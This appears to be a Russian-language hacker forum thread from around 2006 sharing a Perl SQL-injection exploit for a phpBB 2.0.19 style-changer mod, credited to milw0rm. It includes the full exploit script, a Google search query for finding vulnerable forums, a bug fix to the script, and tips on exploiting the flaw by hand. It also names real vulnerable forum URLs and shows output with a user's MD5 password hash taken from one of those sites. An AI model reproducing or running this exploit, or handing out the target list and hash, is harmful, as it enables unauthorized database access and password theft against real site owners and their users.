Форумы phpBB 2.0.19 Exploit

Окуеть уже до 19 дошли...
собственно вот линк _http://www.milw0rm.com/id.php?id=1469
а вот код

Code:

#!/usr/bin/perl
#########################################################
#		 _______ _______ ______ 		#
#		 |______ |______ |     \		#
#		 ______| |______ |_____/		#
#		                        		#
#phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT	#
#Created By SkOd                                        #
#SED security Team                                      #
#http://www.sed-team.be                                 #
#[email protected]                                      #
#ISRAEL                                                 #
#########################################################
#google:
#"Powered by phpBB" inurl:"index.php?s" OR inurl:"index.php?style"
#########################################################
use IO::Socket;
if (@ARGV < 3){
print q{
############################################################
#   phpBB Style Changer\Viewer MOD SQL injection Exploit   #
#		Tested on phpBB 2.0.19			   #
#	    created By SkOd. SED Security Team             #
############################################################
	bbstyle.pl [HOST] [PATH] [Target id]
	 bbstyle.pl www.host.com /phpbb2/ 2
############################################################
};
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];
print "[+]Make Connection\n";
$serv =~ s/(http:\/\/)//eg;
$path = $dir.'index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id='.$id.'/*';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Connected\n";
while ($hash = <$socket>){
$hash =~ m/open(.*?)template/ && print "[+]User id: $id\n[+]Md5 Hash: $1\n";
}

# milw0rm.com [2006-02-05]

 

shto ta nefuric4it kak nado


C:\>c:\perl\bin\perl.exe c:\bb2.pl http://******* /forums/ 2
[+]Make Connection
[+]Connected


i sjo poslje etovo

 

у кого пахало?Я около 15 пробовал не пашет пока

 

Я незнаю как сплоит, я вручную все делал, работает на ура, у кого руки растут от ушей посвещаеться вот вам форум бажный
http://www.phpbbhacks.com/templatesdemo/
http://www.extremepixels.net/phpbb/
да и ваще их полно в гугле, монстр респект

 

да вручную всё прекрасно работает!)))

 

Работает на все 100% =)

 

У кого не работает, вы из форума копировали сплойт?

 

да)))

 

Ошибка В Exploit-е есть =)) Ну что парни кто не любит в Ручную ищите Ошибку в Скрипте =))

 

Всё работает на ура, всё нормально

 

о спасибо лимпопо, действительно ошибка =)))
вот быстренько исправил, у кого руки не из задницы поймут

while ($hash = <$socket>){
$hash =~ m/open(.*?)template/ ;
$pass=$1;
}
print "[+]User id: $id\n[+]Md5 Hash: $pass\n";

 

Рабочая верcия Выглядит так!
perl phpbb19.pl http://www.extremepixels.net /phpbb/
[+]Make Connection
[+]Connected
[+]User id: 2
[+]Md5 Hash: 12d187897ee09aa0900af90c29f0936c


Вуаля =))

 

Вручную юзается хорошо. Но не везде работает=(
На многих форумах ничего не происходит=(

 

Значит пропатчины или Другая версия phpbb

 

Видимо...
Но тестил на локал хосте. Версия 100% 2.0.19.
Ничего не происходит. Никакие патчи вроде не ставлены. Версия оригинальная.
На приведённых в топике форумах всё работает.
Хм... Странновато малость. Или я ламмерю?

 

ошибка же не в форуме а в моде

 

Люди, скажите пожалуйста, как его запустить на перле? У меня установлен ActivePerl 5.8.3

 

имхо, юзайте вручную, запарили ныть уже)))

 

zaivi d cmd -> i napishi perl lalala.pl

 

Вручную проще! Работает классно.
А он тока на 19 работает?